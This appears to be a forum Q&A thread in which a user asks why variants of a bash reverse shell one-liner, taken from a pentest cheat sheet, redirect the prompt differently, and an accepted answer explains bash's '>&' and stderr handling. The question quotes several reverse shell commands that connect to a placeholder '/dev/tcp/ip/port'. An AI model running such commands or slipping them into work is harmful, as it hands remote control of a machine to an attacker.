# Bash reverse shell strange behavior

Tags: linux, bash, shell, reverse-shell

I tried today to understand as much as I could a command (found [here](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)) to open a reverse shell on the victim side. Here is it:

```sh
bash -i >&/dev/tcp/ip/port 0>&1
```

However, I didn't completely get why the first redirection is `>&`. I understood that `/dev/tcp/ip/port` is a "pseudo" file created by bash, but I didn't find the information if it has to be treated as a real file or as a file descriptor. Therefore, I tried to treat it like a real file and rewrote the bash command like this :

```sh
bash -i >/dev/tcp/ip/port 0>&1
```

In this case, a strange behavior happen: the reverse shell is working as expected (I can type some command on the attacker side and get the output on the attacker side too), except for one output : the bash command prompt text. So the only thing that is not printed on the attacker side but on the victim side is :

```sh
bash-4.4$
```

Everything else is printed as expected, i.e on the attacker side.

The last test I tried is to change the bash command like this :

```sh
bash -i >/dev/tcp/ip/port <&1
```

Indeed, after reading the man page of bash, it made more sense to me to use the `<` redirection, as as it's stated on the man page, this opens the file descriptor `1` for reading on file descriptor `0`. Here, the same problem as the second command arises (everything is printed on the attacker except the bash command prompt `bash-4.4$`).

I also noted that redirecting stderr like :

```sh
bash -i >/dev/tcp/ip/port 2>&2 <&1
```

solves the problem, as if `bash-4.4$` was printed on stderr...

I thus have four questions for which I cannot find an answer :

1. Should `/dev/tcp` and `/dev/udp` be treated as file or directly as file descriptor ? Which is equivalent to asking : should we write `echo "hello" >/dev/tcp/ip/port` or `echo "hello" >&/dev/tcp/ip/port` ?
2. Why does the author used `0>&1` to change stdin instead of `<&1`, and how is it possible that it works in the first version of the command ?
3. Why is this strange behavior happening with the second and third command ? How is it possible that only part of the output is redirected ? In my point of view it should either redirect everything or nothing.
4. Why does redirecting stderr in the last command solves the problem ? This is not done on the first command (the original one of the author) but it still works..

Thank you very much in advance for your answers ! I hope I made this post as clear as possible.

Comment: did the usage of "0>&1" and "<&1" give the same effect? i.e. was stdin bound to attacker's terminal instead of victim's terminal in both cases?

Comment: regarding the shell prompt, as far as I know, it is redirected to /dev/tty associated with terminal session, not stdin or stdout or stderr but it is probably different across unix versions

Answer (score 0, accepted):

1. A file descriptor in `bash` is a *number*, i. e. *one or more digits*, so `/dev/…` is definitely not a file descriptor. You were mislead by the special construct `>&`, which unless followed by a number is not the redirection operator for duplicating an output file descriptor, but the unpreferred format for [redirecting standard output and standard error](https://www.gnu.org/savannah-checkouts/gnu/bash/manual/html_node/Redirections.html#Redirecting-Standard-Output-and-Standard-Error).
2. Why *the author used `0>&1` to change stdin instead of `<&1`*, only he (or someone who can read his mind) can tell; I agree with you that it makes more sense to use the `<` redirection. Both versions work because `&1` refers to `/dev/tcp/ip/port`, which can be read from as well as written to.
3. The behavior is not strange at all, since, as you already wrote, the prompt is *printed on stderr*.
4. Well, *redirecting stderr* **is** *done on the first command* by `>&`.

Comment: Great, this explains everything ! Thanks a lot :)